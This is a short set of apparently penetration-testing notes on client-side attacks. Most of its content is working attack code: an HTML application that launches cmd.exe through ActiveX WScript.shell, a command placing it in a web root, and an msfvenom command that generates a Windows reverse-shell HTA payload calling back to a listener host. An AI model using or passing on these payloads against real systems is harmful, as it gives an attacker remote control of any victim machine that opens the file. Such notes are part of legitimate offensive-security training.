Client Side Attacks
Enumeration
Leveraging HTML Apps
<!DOCTYPE html> <html> <head> <script> var x='cmd.exe' new ActiveXObject('WScript.shell').Run(x); </script> </head> <body> <script> self.close() </script> </body> </html>sudo cp file.hta /var/www/html/file2.htasudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
Exploiting Microsoft Office
Resources:
Last updated